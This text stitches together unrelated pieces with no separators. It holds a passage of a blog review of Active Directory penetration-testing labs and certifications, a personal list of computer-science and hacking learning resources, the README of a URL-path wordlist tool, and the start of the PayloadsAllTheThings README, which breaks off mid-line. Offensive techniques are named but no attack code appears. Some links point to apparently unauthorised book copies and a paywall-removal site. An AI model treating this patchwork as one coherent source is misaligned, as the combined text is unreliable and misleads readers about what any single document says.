small. Not really "entry level" for Active Directory to be honest but it is good if you want to learn more about Citrix, SMTP spoofing, credential based phishing, multiple privilege escalation techniques, Kerberoasting, hash cracking, token impersonation, wordlist generation, pivoting, sniffing, and bruteforcing. A LOT of things are happening here. Definitely not an easy lab but the good news is, there is already a writeup available for VIP Hack The Box users! If you want to learn more about the lab feel free to check it on this URL: https://www.hackthebox.eu/home/endgame/view/2 # Endgame Hades: I've completed Hades Endgame back in December 2019 so here is what I remember so far from it: **Price:** Free with Guru Rank and above **Ease of use:** Easy. You get an .ovpn file and you connect to it. **Ease of reset:** Can be reset ONLY after 5 Guru ranked users vote to reset it. This is actually good because if no one other than you want to reset, then you probably don't need a reset! **Ease of support:** Community support only! Meaning that you'll have to reach out to people in the forum to ask for help if you got stuck OR in the discord channel. **Course:** Doesn't come with any course, it's just a lab so you need to either know what you're doing or have the Try Harder mentality! **Goal:** "The goal is to gain a foothold on the internal network, escalate privileges and ultimately compromise the domain while collecting several flags along the way." **Certificate:** N/A. You'll just get one badge once you're done. **Exam:** N/A. **Difficulty:** Hard **Release Date:** October 2019. **Retired:** Still Active. Even though this lab is small, only 3 machines, in my opinion, it is actually more difficult than some of the Pro Labs! It contains a lot of things ranging from web application exploitation to Active Directory misconfiguration abuse. This lab actually has very interesting attack vectors that are definitely applicable in real life environments. I can't talk much about the lab since it is still active. However, all I can say is that you need a lot of enumeration and that it is easier to switch to Windows in some parts :) It is doable from Linux as I've actually completed the lab with Kali only, but it just made my life much harder ><. Yes Impacket works just fine but it will be harder to do certain things in Linux and it would be as easy as "clicking" the mouse in Windows. At that time, I just hated Windows, so I wanted to spend more time doing it in Linux even though the author of the lab himself told me to do it in Windows and that he didn't test it with Linux. My only hint for this Endgame is to make sure to sync your clock with the machine! If you want to learn more about the lab feel free to check it on this URL: https://www.hackthebox.eu/home/endgame/view/3 # Pro Labs: Offshore: There is a new Endgame called RPG Endgame that will be online for Guru ranked and above starting from June 16th. More information about it can be found from the following URL: https://www.hackthebox.eu/home/endgame/view/4 Since I haven't really started it yet, I can't talk much about it. Now that I've covered the Endgames, I'll talk about the Pro Labs. Note that I've only completed 2/3 Pro Labs (Offshore & RastaLabs) so I can't say much about Pro Labs:Cybernetics but you can read more about it from the following URL: https://www.hackthebox.eu/home/labs/pro/view/3. The only thing I know about Cybernetics is that it includes Linux AD too, which is cool to be honest. Anyway, as the name suggests, these labs are targeting professionals, hence, "Pro Labs." However, in my opinion, Pro Lab: Offshore is actually beginner friendly. In fact, I ALWAYS advise people who are interested in Active Directory attacks to try it because it will expose them to a lot of Active Directory Attacks :) Even though I'm saying it is beginner friendly, you still need to know certain things such as what I have mentioned in the recommendation section above before you start! I've completed Pro Labs: Offshore back in November 2019. Also, it is worth noting that all Pro Labs including Offshore, are updated each quarter. That being said, Offshore has been updated TWICE since the time I took it. This means that my review may not be so accurate anymore, but it will be about right because based on my current completion percentage it seems that 85% of the lab still hasn't changed :) **Price:** one time £70 setup fee + £20 monthly. Note that this is a separate fee, that you will need to pay even if you have VIP subscription. Additionally, you do NOT need any specific rank to attempt any of the Pro Labs. **Ease of use:** Easy. You get an .ovpn file and you connect to it. **Ease of reset:** The lab gets a reset automatically every day. **Ease of support:** Community support only! Meaning that you'll have to reach out to people in the forum to ask for help if you got stuck OR in the discord channel. **Course:** Doesn't come with any course, it's just a lab so you need to either know what you're doing or have the Try Harder mentality! **Goal:** "Players will have the opportunity to attack 17 hosts of various operating system types and versions to obtain 34 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout." **Certificate:** Yes. You'll receive 4 badges once you're done + a certificate of completion with your name. **Exam:** N/A. **Difficulty:** Intermediate **Release Date:** September 2018. **Retired:** Still active & updated every quarter! As I said, In my opinion, this Pro Lab is actually beginner friendly, at least to a certain extent. There are 17 machines & 4 domains allowing you to be exposed to tons of techniques and Active Directory exploitations! You will have to gain foothold and pivot through the network and jump across trust boundaries to complete the lab. There is web application exploitation, tons of AD enumeration, local privilege escalation, and also some CTF challenges such as crypto challenges on the side. It is worth noting that in my opinion there is a 10% CTF component in this lab. However, the other 90% is actually VERY GOOD! I would highly recommend taking this lab even if you're still a junior pentester. Note that I was Metasploit & GUI heavy when I tried this lab, which helped me with pivoting between the 4 domains. You can probably use different C2s to do the lab or if you want you can do it without a C2 at all if you like to suffer :) If you're new to BloodHound, this lab will be a magnificent start as it will teach you how to use BloodHound! Of course, you can use PowerView here, AD Tools, or anything else you want to use! More about Offshore can be found in this URL from the lab's author: https://www.mrb3n.com/?p=551 If you think you're ready, feel free to purchase it from here: https://www.hackthebox.eu/home/labs/pro/view/2 # Pro Labs: RastaLabs: I've completed Pro Labs: RastaLabs back in February 2020. As with Offshore, RastaLabs is updated each quarter. That being said, RastaLabs has been updated ONCE so far since the time I took it. This means that my review may not be so accurate anymore, but it will be about right :) **Price:** one time £70 setup fee + £20 monthly. Note that this is a separate fee, that you will need to pay even if you have VIP subscription. Additionally, you do NOT need any specific rank to attempt any of the Pro Labs. **Ease of use:** Easy. You get an .ovpn file and you connect to it. **Ease of reset:** The lab does NOT get a reset unless if there is a problem! The reason being is that RastaLabs relies on persistence! **Ease of support:** RastaMouse is actually very active and if you need help, he'll guide you without spoiling anything. Other than that, community support is available too through forums and Discord! **Course:** Doesn't come with any course, it's just a lab so you need to either know what you're doing or have the Try Harder mentality. Actually, in this case you'll CRY HARDER as this lab is actually pretty "hard." **Goal:** "The goal of the lab is to reach Domain Admin and collect all the flags." **Certificate:** Yes. You'll receive 4 badges once you're done + a certificate of completion. **Exam:** N/A. **Difficulty:** Hard **Release Date:** ~ January 2018. **Retired:** Still active & updated every quarter! Unlike Pro Labs Offshore, RastaLabs is actually NOT beginner friendly. It is intense! You will not be able to easily use MetaSploit as the AV is actually very up to date and it will not like a lot of the tools that you would want to use. There is also AMSI in place and other mitigations. This means that you'll either start bypassing the AV OR use native Windows tools. I've decided to choose the 2nd option this time, which was painful. Additionally, there was not a lot of GUI possibility here too, and I wanted to stay away from it anyway to be as stealthy as possible. There are about 14 servers that can be compromised in the lab with only one domain. Even though it has only one domain, in my opinion, it is still harder than Offshore, which has 4 domains. The lab also focuses on maintaining persistence so it may not get a reset for weeks unless if something crashes. The problem with this is that your IP address may change during this time, resulting in a loss of your persistence. It is worth noting that there is a small CTF component in this lab as well such as PCAP and crypto. Some flags are in weird places too. The lab will require you to do tons of things such as phishing, password cracking, bruteforcing, password manipulation, wordlist creation, local privilege escalation, OSINT, persistence, Active Directory misconfiguration exploitation, and even exploit development, and not the easy kind! More information about the lab from the author can be found here: https://static1.squarespace.com/static/5be0924cfcf7fd1f8cd5dfb6/t/5be738704d7a9c5e1ee66103/1541879947370/RastaLabsInfo.pdf If you think you're ready, feel free to purchase it from here: https://www.hackthebox.eu/home/labs/pro/view/1 # Elearn Security's Penetration Testing eXtreme & eLearnSecurity Certified Penetration Testing eXtreme Certificate: Now that I'm done talking about the Endgames & Pro Labs, let's start talking about Elearn Security's Penetration Testing eXtreme (eCPTX v1). I took the course and cleared the exam back in November 2019. It is worth noting that Elearn Security has just announced that they'll introduce a new version of the course! (not sure if they'll update the exam though but they will likely do that too!) That being said, this review is for the PTXv1, not for PTXv2! There is a webinar for new course on June 23rd and ELS will explain in it what will be different! **Price:** There are 3 course plans that ranges between $1699-$1999 (Note that this may change when the new version is up!). However, you can choose to take the exam only at $400 without the course. You can check the different prices and plans based on your need from this URL: https://www.elearnsecurity.com/course/penetration_testing_extreme/enroll/ Note that ELS do some discount offers from time to time, especially in Black Friday and Cyber Monday! For example, there is a 25% discount going on right now! **Ease of use:** Easy. You get an .ovpn file and you connect to it. There are really no AD labs that comes with the course, which is really annoying considering that you will face just that in the exam! **Ease of reset:** You are alone in the environment so if something broke, you probably broke it. For the exam you get 4 resets every day, which sometimes may not be enough. **Ease of support:** There is some level of support in the private forum. **Course:** Yes! PDF & Videos (based on the plan you choose). **Goal:** Take the exam and become eCPTX. **Certificate:** Only once you pass the exam! **Exam:** Yes. 48 hours practical exam + 24 hours report. The good thing about ELS is that they'll give you your 2nd attempt for free if you fail! **Difficulty:** Intermediate **Release Date:** 2017 but will be updated this month! **Retired:** this version will be retired and replaced with the new version either this month or in July 2020! Unfortunately, not having a decent Active Directory lab made this a very bad deal given the course's price. In fact, if you are a good network pentester & you've completed at least 75% of Pro Labs Offshore I can guarantee you that you'll pass the exam without looking at the course! I always advise anyone who asks me about taking eCPTX exam to take Pro Labs Offshore! Their course + the exam is actually MetaSploit heavy as with most of their courses and exams. The course itself, was kind of boring (at least half of it). However, the course talks about multiple social engineering methods including obfuscation and different payload creation, client-side attacks, and phishing techniques. They also talk about Active Directory and its usual misconfiguration and enumeration. Additionally, they explain how to bypass some security measurements such as AMSI, and PowerShell's constraint language mode. They also mention MSSQL (moving between SQL servers and enumerating them), Exchange, and WSUSS abuse. They also rely heavily on persistence in general. The very big disadvantage from my opinion is not having a lab and facing a real AD environment in the exam without actually being trained on one. Moreover, the exam itself is mostly network penetration testing with a small flavor of active directory. Not really what I was looking for when I took the exam, but it was a nice challenge after taking Pro Labs Offshore. # Windows Red Team Lab & Certified Red Team Expert Certificate: Now that I'm done talking about the eLS AD course, let's start talking about Pentester Academy's. Pentestar Academy in general has 3 AD courses/exams. CRTP, CRTE, and finally PACES. The first one is beginner friendly and I chose not to take it since I wanted something a bit harder. The last one has a lab with 7 forests so you can image how hard it will be LOL. As such, I've decided to take the one in the middle, CRTE. I took the course and cleared the exam in June 2020. **Price:** It ranges from $600-$1500 depending on the lab duration. However, they ALWAYS have discounts! For example, currently the prices range from $299-$699 (which is worth it every penny)! You can read more about the different options from the URL: https://www.pentesteracademy.com/redteamlab **Ease of use:** Easy. You get an .ovpn file and you connect to it in the labs & in the exam. **Ease of reset:** The lab gets a reset every day. However, the exam doesn't get any reset & there is NO reset button! You will have to email them to reset and they are not available 24/7. Meaning that you may lose time from your exam if something gets messed up. Even worse, you will NOT know if something gets messed up, so you'll just have to guess. **Ease of support:** They are very friendly, and they'll help you through the lab if you got stuck. During the exam though, if you actually needed something (i.e. if something broke), they will reply only during office hours (it seems). **Course:** Yes! PDF & Videos. **Goal:** finish the lab & take the exam to become CRTE. **Certificate:** Only once you pass the exam! **Exam:** Yes. 48 hours practical exam including the report. Note that if you fail, you'll have to pay for the exam voucher ($99) **Difficulty:** Hard **Release Date:** July 2018 **Retired:** Nope This lab was actually intense & fun at the same time. In other words, it is also not beginner friendly. There are 2 difficulty levels. The default is hard. However, I would highly recommend leaving it this way! The lab focuses on using Windows tools ONLY. You'll have a machine joined to the domain & a domain user account once you start. From there you'll have to escalate your privileges and reach domain admin on 3 domains! This include abusing different kind of Active Directory attacks & misconfiguration as well as some security constraints bypass such as AppLocker and PowerShell's constraint language mode. Additionally, there is phishing in the lab, which was interesting! The lab also focuses on SQL servers’ attacks and different kinds of trust abuse. The course itself is not that good because the lab has "experts" as its target audience, so you won't get much information from the course's content since they expect you to know it! However, the labs are GREAT! They include a lot of things that you'll have to do in order to complete it. Note that there is also about 10-15% CTF side challenges that includes crypto, reverse engineering, pcap analysis, etc. However, submitting all the flags wasn't really necessary. Meaning that you will be able to finish it without actually doing them. Also, the order of the flags may actually be misleading so you may want to be careful with this one even if they tell you otherwise! The most important thing to note is that this lab is Windows heavy. Meaning that you won't even use Linux to finish it! You'll use some Windows built in tools, Windows signed tools such as Sysinternals & PowerShell scripts to finish the lab. Of course, Bloodhound will help here too. Same thing goes with the exam. I actually needed something like this, and I enjoyed it a lot! The exam was rough, and it was 48 hours that INCLUDES the report time. I can't talk much about the exam, but it consists of 8 machines, and to pass you'll have to compromise at least 3 machines with a good report. However, you may fail by doing that if they didn't like your report. The only way to make sure that you'll pass is to compromise the entire 8 machines! Without being able to reset the exam/boxes, things can be very hard and frustrating. I had an issue in the exam that needed a reset, and I couldn't do it myself. I spent time thinking that my methods were wrong while they were right! I emailed them and received an email back confirming that there is an issue after losing at least 6 hours! They were nice enough to offer an extension of 3 hours, but I ended up finishing the exam before my actual time finishes so didn't really need the extension. If you are planning to do something more beginner friendly from Pentester Academy feel free to try CRTP. I've heard good things about it. # Red Team Ops & Certified Red Team Operator: After CRTE, I've decided to try CRTO since this is one gets sold out VERY quickly, I had to try it out to understad why. To sum up, this is one of the best AD courses I've ever taken. It is different than most courses you'll encounter for multiple reasons, which I'll be talking about shortly. I took the course and cleared the exam in September 2020. **Price:** It ranges from £399-£649 depending on the lab duration. In my opinion, one month is enough but to be safe you can take 2. The content is updated regularly so you may miss new things to try ;) You can also purchase the exam separately for a small fee but I wouldn't really recommend it. **Ease of use:** Easy. You get an .ovpn file and you connect to it in the labs & in the exam. **Ease of reset:** You can reboot any 1 machine once every hour & you need 6 votes for a revert of the entire lab. In the exam, you are entitled to only 1 reboot in the 48 hours (it is not easy because you need to talk to RastaMouse and ask him to do it manually, which is subject to availability) & you don't have any option to revert! **Ease of support:** As with RastaLabs, RastaMouse is actually very active and if you need help, he'll guide you without spoiling anything. Other than that, community support is available too through Slack! **Course:** Yes! HTML & Videos. The reason is, the course gets updated regularly & you have LIFE TIME ACCESS to all the updates (Awesome!) **Goal:** finish the lab & take the exam to become CRTO OR use the external route to take the exam without the course if you have OSCP (not recommended). **Certificate:** You get a badge once you pass the exam & multiple badges during complention of the course **Exam:** Yes. 48 hours practical exam without a report. Note that if you fail, you'll have to pay for a retake exam voucher (£99) **Difficulty:** Intermediate **Release Date:** January 2020 **Retired:** Nope Red Team Ops is very unique because it is the 1st course to be built upon Covenant C2. Not only that, RastaMouse also added Cobalt Strike too in the course! Even better, the course gets updated AND you get a LIFETIME ACCESS to the update! Who does that?! Awesome! Anyway, another difference that I thought was interesting is that the lab is created in a way that you will probably have to follow the course in order to complete it or you'll miss on a few things here and there. The course is amazing as it shows you most of the Red Teaming Lifecycle from OSINT to full domain compromise. The most interesting part is that it summarizes things for you in a way that you won't see in other courses. Why talk about something in 10 pages when you can explain it in 1 right? The course talks about most of AD abuses in a very nice way. There is no CTF involved in the labs or the exam. The lab has 3 domains across forests with multiple machines. It is very well done in a way that sometimes you can't even access some machines even with the domain admin because you are supposed to do it the intended way! The course talks about delegation types, Kerberos abuse, MSSQL abuse, LAPS abuse, AppLocker, CLM bypass, privilege escalation, AV Bypass, etc. A LOT OF THINGS! Most interesting attacks have a flag that you need to obtain, and you'll get a badge after completing every assignment. The exam was easy to pass in my opinion. The exam is 48 hours long, which is too much honestly. I think 24 hours is more than enough. I can't talk much about the details of the exam obviously but in short you need to get 3 out of 4 flags without writing any writeup. As I said earlier, you can't reset the exam environment. Without being able to reset the exam, things can be very hard and frustrating. In fact, if you had to reset the exam without getting the passing score, you pretty much failed. You can reboot one machine ONLY one time in the 48 hours exam, but it has to be done manually (I.e., you need to contact RastaMouse and asks him to reset it). This is obviously subject to availability and he is not usually available in the weekend so if your exam is on the weekend, you can pray that nothings get screwed up during your exam. I had an issue in the exam that needed a reset. It happened out of the blue. Basically, what was working a few hours earlier wasn't working anymore. I contacted RastaMouse and issued a reboot. That didn't help either. However, since I got the passing score already, I just submitted the exam anyway. # Evasion Techniques and Breaching Defenses (PEN-300) & Offensive Security Experienced Penetration Tester After CRTO, I've decided to try the exam of the new Offensive Security course, OSEP. To sum up, this is one of the best courses I've taken so far due to the amount of knowledge it contains. I took the course in February 2021 and cleared the exam in March 2021, so this was my most recent AD lab/exam. **Price:** It ranges from $1299-$1499 depending on the lab duration. In my opinion, 2 months are more than enough. However, make sure to choose wisely because if you took 2 months and ended up needing an extension, you'll pay extra! **Ease of use:** Easy. You get an .ovpn file and you connect to it in the labs & in the exam. **Ease of reset:** You can revert any lab module, challenge, or exam at any time since the environment is created only for you. In the exam, you are entitled to a significant amount of reverts, in case you need it. I don't know if I'm allowed to say how many but it is definitely more than you need! **Ease of support:** There is community support in the forum, community chat, and I think Discord as well. **Course:** PDF & Videos. **Goal:** finish the course & take the exam to become OSEP **Certificate:** You get a physical certificate & YourAcclaim badge once you pass the exam **Exam:** Yes. 48 hours practical exam followed by a 24 hours for a report. Note that if you fail, you'll have to pay for a retake exam voucher ($200) **Difficulty:** Hard **Release Date:** October 2020 **Retired:** Nope PEN-300 is one of the new courses of Offsec, which is one of 3 courses that makes the new OSCE3 certificate. The course is the most advance course in the Penetration Testing track offered by Offsec. PEN-300 is very unique because it is very focused on evasion techniques and showing you the "how" and "why" of a lot of things under the hood. I don't want to rewrite what is in the syllabus, but the course is really great in my opinion, especially in the evasion part. The course not only talks about evasion binaries, it also deals with scripts and client side evasions. What is even more interesting is having a mixture of both. Moreover, the course talks about "most" of AD abuses in a very nice way. The course talks about evasion techniques, delegation types, Kerberos abuse, MSSQL abuse, LAPS abuse, AppLocker, CLM bypass, privilege escalation, AV Bypass, etc. A LOT OF THINGS! They are missing some topics that would have been nice to have in the course to be honest. However, the fact that the PDF is more than 700 pages long, I can probably turn a blind eye on this. There is no CTF involved in the labs or the exam. The lab consists of a set of exercise of each module as well as an extra mile (if you want to go above and beyond) and 6 challenges. You get access to a dev machine where you can test your payloads at before trying it on the lab, which is nice! The challenges start easy (1-3) and progress to more challenging ones (4-6). The first 3 challenges are meant to teach you some topics that they want you to learn, and the later ones are meant to be more challenging since they are a mixture of all what you have learned in the course so far. Each challenge may have one or more flags, which is meant to be as a checkpoint for you. As usual with Offsec, there are some rabbit holes here and there, and there is more than one way to solve the labs. What I didn't like about the labs is that sometimes they don't seem to be stable. I.e., certain things that should be working, don't. Fortunately, I didn't have any issues in the exam. The exam was easy to pass in my opinion since you can pass by getting the objective without completing the entire exam. The exam is 48 hours long, which is too much honestly. I think 24 hours is more than enough, which will make it more challenging. I can't talk much about the details of the exam obviously but in short you need to either get an objective OR get a certain number of points, then do a report on it. As with the labs, there are multiple ways to reach the objective, which is interesting, and I would recommend doing both if you had the time. As far as the report goes, as usual, Offsec has a nice template that you can use for the exam, and I would recommend sticking with it. My report was about 80 pages long, which was intense to write. It took me hours. My recommendation is to start writing the report WHILE having the exam VPN still active. Otherwise, you may realize later that you have missed a couple of things here and there and you won't be able to go back and take screenshot of them, which may result in a failure grade. As a final note, I'm actually planning to take more AD/Red Teaming labs in the future, so I'll keep updating this page once I finish a certain lab/exam/course. I hope that you've enjoyed reading! If you have any questions, comments, or concerns please feel free to reach me out on Twitter @ https://twitter.com/Ryan_412_/
# BesiJossResources Basically here I list the best resources I find while learning a new thing or two. ## Computer Science Overview - [CrashCourse](https://www.youtube.com/playlist?list=PL8dPuuaLjXtNlUrzyH5r6jN9ulIgZBpdo) - [Code: The Hidden Language of Computer Hardware and Software](<https://raw.githubusercontent.com/muditbac/Reading/master/programming/Charles%20Petzold-Code_%20The%20Hidden%20Language%20of%20Computer%20Hardware%20and%20Software-Microsoft%20Press%20(2000).pdf>) - [nand2tetris](https://www.nand2tetris.org/) ## Getting started with Linux - [Linux Journey](https://linuxjourney.com/) - [Useful Linux Commands by LearnLinuxTv](https://www.youtube.com/playlist?list=PLT98CRl2KxKHaKA9-4_I38sLzK134p4GJ) - [Learn Enough Command Line to Be Dangerous](https://pdfroom.com/books/learn-enough-command-line-to-be-dangerous-a-tutorial-introduction-to-the-unix-command-line/1j5KLrKGdKr/download) - [Bandit Wargame (advanced)](https://overthewire.org/wargames/bandit/) - [The Linux Command Line (Reference book)](<https://raw.githubusercontent.com/santosh373/Linux-Basics/master/The%20Linux%20Command%20Line%2C%20A%20Complete%20Introduction%202nd%20(2013).pdf>) ## Assembly x86 - [Programming from the ground up](http://nongnu.askapache.com/pgubook/ProgrammingGroundUp-1-0-lettersize.pdf) - [Oracle x86 assembly reference](https://docs.oracle.com/cd/E19641-01/802-1948/802-1948.pdf) - [Assembly Primer For Hackers](https://youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR) - [Hacking : TAOE](<https://raw.githubusercontent.com/vxlabinfo/lib/master/exploit/Hacking-%20The%20Art%20of%20Exploitation%20(2nd%20ed.%202008)%20-%20Erickson.pdf>) ## C Programming - [Neso Academy](https://www.youtube.com/playlist?list=PLBlnK6fEyqRhX6r2uhhlubuF5QextdCSM) ### &nbsp; &nbsp; Bangla Resources on C and Competitive Programming - [TameemShahriarSubeen](https://www.rokomari.com/book/123261/computer-programming-1st-2nd-and-3rd-khondo-rokomari-collection) - [LoveExtendsCode](https://www.youtube.com/c/LoveExtendsCode/) ## SQL - [SQLbolt](https://sqlbolt.com/) ## BesiJoss Youtube Channels | Channel Link | Description | | ----------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------ | | [ComputerPhile](https://www.youtube.com/user/Computerphile) | Great talks on CS concepts, Sister channel of Numberphile | | [Neso Academy](https://www.youtube.com/c/nesoacademy/) | _Savior of us CS students, they don't require a description_ | | [Fireship.io](https://www.youtube.com/c/Fireship) | _Technology is my drug, fireship is my dealer_ | | [PowerCert](https://www.youtube.com/c/PowerCertAnimatedVideos) | Animated video on virtually every CS topic | | [Art of the problem](https://www.youtube.com/c/ArtOfTheProblem) | CS theories visually explained | | [Reducible](https://www.youtube.com/c/Reducible) | Animated computer science concepts and problem solving | | [BenAwad](https://www.youtube.com/c/BenAwad97) | _Who said programmers don't have humor_ | | [Forrest Knight](https://www.youtube.com/c/FKnight) | Tech news and guidelines | | [Sentdex](https://www.youtube.com/c/sentdex/) | AI, Machine Learning with Python | | [Two Minutes Papers](https://www.youtube.com/c/K%C3%A1rolyZsolnai/) | AI research and news | | [ StatQuest](https://www.youtube.com/c/joshstarmer/) | Statistics, Machine Learning and Data Science | | [CodeBullet](https://www.youtube.com/c/CodeBullet/) | AI does fun stupid things | | [SebastianLague](https://www.youtube.com/c/SebastianLague) | _We programmers are only limited by our imaginations_ | | [Ben Eater](https://www.youtube.com/c/BenEater) | Computer Architecture from scratch and projects | | [The Cherno](https://www.youtube.com/c/TheChernoProject) | C++ projects and Game theory | | [TechWithTim](https://www.youtube.com/c/TechWithTim) | Python & JS tutorials | | [HusseinNasser](https://www.youtube.com/c/HusseinNasser-software-engineering) | Most informative news and tutorials for Backend Development | | [Distrotube](https://www.youtube.com/c/DistroTube/) | Linux Distro Review, customization and more | | [FunFunFunction](https://www.youtube.com/c/funfunfunction) | Advanced JS and webdev contents | | [TheCodingTrain](https://www.youtube.com/c/TheCodingTrain) | Vast array of coding challanges mostly done with JavaScript | | [John Hammond](https://www.youtube.com/c/JohnHammond010) | Basically the king of exploitation, hacking and CTFs | | [David Bombal](https://www.youtube.com/c/DavidBombal) | Everything about Linux, Python, Ethical Hacking, Networking, CCNA, Virtualization and more | | [NetworkChuck](https://www.youtube.com/c/NetworkChuck) | IT certifications, networking and hacking with a lot of enthusiasm | | [Seytonic](https://www.youtube.com/c/Seytonic) | Breakdown of CyberSec related news | | [TheCyberMentor](https://www.youtube.com/c/TheCyberMentor) | Hacking tutorials and more | | [Ippsec](https://www.youtube.com/c/ippsec/) | HackTheBox walkthrough and explanations | | [LiveOverFlow](https://www.youtube.com/c/LiveOverflow/) | Intuitive videos on cybersecurity, hacking and CTFs | | [LoiLiangYang](https://www.youtube.com/c/LoiLiangYang/) | Ethical Hacking and Cybersecurity | | [HackerSploit](https://www.youtube.com/c/HackerSploit) | Pentesting, Red Teaming and Linux | | [NullBytes](https://www.youtube.com/c/NullByteWHT) | Hacking, Hardware pwning and more | | [Chris Greer](https://www.youtube.com/c/ChrisGreer) | WireShark and network troubleshooting | | [Danooct1](https://www.youtube.com/c/danooct1) | Virus and Malware Analysis | | [DayZeroSec](https://www.youtube.com/c/dayzerosec) | Reverse engineering / exploit development-related content | ## BesiJoss Websites | Links | Description | | ------------------------------------- | ------------------------------------------------------ | | [Roadmap.sh](https://roadmap.sh/) | Developer Roadmap | | [12ft Ladder](https://12ft.io/) | Remove paywall to read articles from sites like Medium | | [MonkeyType](https://monkeytype.com/) | Typing exercise with addictive UI and good reports |
<h1 align="center">mkpath <a href="https://twitter.com/intent/tweet?text=mkpath%20-%20Make%20URL%20path%20combinations%20using%20a%20wordlist%20https%3A%2F%2Fgithub.com%2Ftrickest%2Fmkpath&hashtags=bugbounty,bugbountytips,infosec"><img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&style=social" alt="Tweet" height="20"/></a></h1> <h3 align="center">Make URL path combinations using a wordlist</h3> ![mkpath](mkpath.png "mkpath") Read a wordlist file and generate path combinations for given domain or list of domains. Input from wordlist file is lowercased and unique words are processed. Additionally, wordlist can be filtered using regex. When you use mkpath's `-l` parameter, it will generate all path combinations up to the specified level, including all lower levels, using words from the wordlist. For instance, with `-l 2`, it will generate `len(permutation_list)^2 + len(permutation_list)` results, which is: - 30 combinations for a 5-word wordlist. - 10100 combinations for a 100-word wordlist. - 250500 combinations for a 500-word wordlist. # Installation ## Binary Binaries are available in the [latest release](https://github.com/trickest/mkpath/releases/latest). ## Docker ``` docker run quay.io/trickest/mkpath ``` ## From source ``` go install github.com/trickest/mkpath@latest ``` # Usage ``` -d string Input domain -df string Input domain file, one domain per line -l int URL path depth to generate (default 1) (default 1) -lower Convert wordlist file content to lowercase (default false) -o string Output file (optional) -only-dirs Generate directories only, files are filtered out (default false) -only-files Generate files only, file names are appended to given domains (default false) -r string Regex to filter words from wordlist file -w string Wordlist file ``` ### Example ##### wordlist.txt ``` dev prod/ admin.py app/login.html ``` ```shell script $ mkpath -d example.com -l 2 -w wordlist.txt example.com/dev example.com/prod example.com/dev/dev example.com/prod/dev example.com/dev/prod example.com/prod/prod example.com/dev/admin.py example.com/dev/app/login.html example.com/prod/admin.py example.com/prod/app/login.html example.com/dev/dev/admin.py example.com/dev/dev/app/login.html example.com/prod/dev/admin.py example.com/prod/dev/app/login.html example.com/dev/prod/admin.py example.com/dev/prod/app/login.html example.com/prod/prod/admin.py example.com/prod/prod/app/login.html ``` # Report Bugs / Feedback We look forward to any feedback you want to share with us or if you're stuck with a problem you can contact us at [support@trickest.com](mailto:support@trickest.com). You can also create an [Issue](https://github.com/trickest/mkpath/issues/new) or pull request on the Github repository. # Where does this fit in your methodology? Mkpath is an integral part of many workflows in the Trickest store. Sign up on [trickest.com](https://trickest.com) to get access to these workflows or build your own from scratch! [<img src="./banner.png" />](https://trickest-access.paperform.co/)
# Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I <3 pull requests :) Every section contains: - README.md - vulnerability description and how to exploit it - Intruders - a set of files to give to Burp Intruder - Some exploits You might also like : - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/) - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits) - Shellshock - HeartBleed - Apache Struts 2 ## Tools * [Kali Linux](https://www.kali.org/) * [Web Developer](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/) * [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) - Not compatible with Firefox Quantum * [Burp Proxy](https://portswigger.net) * [Fiddler](https://www.telerik.com/download/fiddler) * [DirBuster](https://sourceforge.net/projects/dirbuster/) * [GoBuster](https://github.com/OJ/gobuster) * [Knockpy](https://github.com/guelfoweb/knock) * [SQLmap](http://sqlmap.org) * [Nikto](https://cirt.net/nikto2) * [Nessus](http://www.tenable.com/products/nessus-vulnerability-scanner) * [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) * [Wappalyzer](https://wappalyzer.com/download) * [Metasploit](https://www.metasploit.com/) * [OpenVAS](http://www.openvas.org/) ## Online Challenges * [Hack The Box](hackthebox.eu/) * [Root-Me](https://www.root-me.org) * [Zenk-Security](https://www.zenk-security.com/epreuves.php) * [W3Challs](https://w3challs.com/) * [NewbieContest](https://www.newbiecontest.org/) * [Vulnhub](https://www.vulnhub.com/) * [The Cryptopals Crypto Challenges](https://cryptopals.com/) * [Penetration Testing Practice Labs](http://www.amanhardikar.com/mindmaps/Practice.html) * [alert(1) to win](https://alf.nu/alert1) * [Hacksplaining](https://www.hacksplaining.com/exercises) * [HackThisSite](https://hackthissite.org) * [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/) * [Hackers.gg](hackers.gg) ## Bug Bounty * [HackerOne](https://hackerone.com) * [BugCrowd](https://bugcrowd.com) * [Bounty Factory](https://bountyfactory.io) * [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/) ## Docker | Command | Link | | :------------- | :------------- | | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) | | `docker pull paoloo/sqlmap` | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/) | | `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) | | `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) | | `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) | | `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) | | `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) | | `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) | | `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) | | `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) | | `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) | | `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) | ## More resources ### Book's list: * [Web 